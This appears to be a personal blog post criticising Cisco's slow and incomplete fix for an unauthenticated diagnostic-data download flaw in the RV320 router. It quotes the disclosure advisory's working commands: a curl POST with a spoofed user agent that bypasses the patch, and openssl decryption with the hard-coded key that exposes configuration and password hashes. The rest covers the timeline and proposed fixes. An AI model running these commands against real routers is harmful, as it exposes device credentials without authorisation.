---
layout: post
title: Security an example how not to do it. 
---

Recently an security incident came in the news that shows how not to handle security incidents. 
First an small summary from my side of the issue based on the information from the people that discured the issue 
[redteam-pentesting.de] https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-004/-cisco-rv320-unauthenticated-diagnostic-data-retrieval
The Cisco RV320 Dual Gigabit WAN VPN Router has a web based gui. 
With this GUI there is in the CGI-bin directory an utility program to download debug messages from the Router.
The security issue is that it not just downloads the debug messages (without password) , that could contain already information that you don't want to expose 
to the internet but much more,  also the system configuration and tarred copies of /etc and /var. 

The diagnostic data can be retrieved by issuing an HTTP POST request to
the vulnerable CGI program. OpenSSL is used to decrypt the data with the
hard-coded password "NKDebug12#$%" before unpacking it with tar (output
shortened):

------------------------------------------------------------------------
$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \
  'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug

$ openssl aes-128-cbc -salt -md md5 -d \
  -k 'NKDebug12#$%' < debug > debug.tgz

$ mkdir output && tar -xf debug.tgz -C output/

$ ls -1 output/
debug_messages.txt
etc.tgz
nk_sysconfig
var.tgz

$ cat output/nk_sysconfig
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]
------------------------------------------------------------------------


Now the real issues with this security incident can be seen from the timeline: 
Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-003) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published

It took Cisco 3 months to fix this issue incorrectly. Then when informed that the fix was incorrect they needed more than 2 months. 
The problem is that if you publish a software  update for a security issue for an important piece of software or hardware, the bad guys will analyse your update. 
This will try to understand the issue in detail, the details that are typically left out from the initial problem description (CVE) to make it too easy for
the bad hackers to exploit the issue. 

They try to understand in which part of the software the issues lies, how the old software is vulnerable and if there exists other security issues in the same software part 
that can be abused. 

Now when publishing such a security update, there is pressue to deliver a fix quickly. 

The current fix in firmware 1.4.2.20 disallows curl based on http user agent.  
This is a bad fix and a trivial change was made in the proof of content code above (-A kurl) to allow the issue to persist.

Better fixes would be 
    - Remove the export_debug_msg.exp completely from the sofware distribution. I could not find the functionality mentioned in the external software documentation so it looks to me like an internal command for Cisco support  personell.
    Check if it is really used in the field and if there are no other more secure procedures. 
    - Only export to the local network not to the entire internet. Stop any communication if is not form a local interface and make the answer non-routable. 
    This avoids the vulnerable software being scanned and abused remotely. 
    - Make the decryption key device specific instead of an hardcoded value. Each customer should provide some information to the support engineer that does not know yet, to decrypt the software. 
    For example Serial number of the device + the date the program was run as key.
    - Add a username/password to the program so only authorized users can run it.
    
Morale of the story 

Fixing security issues: 

Actively discuss and select a good solution for security fixes. Not the 'just fix it approach' but specify and discuss fixes. 
Propose multiple solutions and select the best one. 
Here Cisco management dropped the ball. That the engineer in question made the error is not good but that the supervisors did not catch the issue is unexcusable. 

Timelines: 

Security issues are race between the administrators of systems and the bad guys. The longer a fix takes the more damage is done.
A 3 month period for the first update is long, the more than 2 month for a correction on the earlier fix really hurt some people using this equipment. 

You need to have a process in place to produce emergency fixes quickly, in a matter of days, not months. 


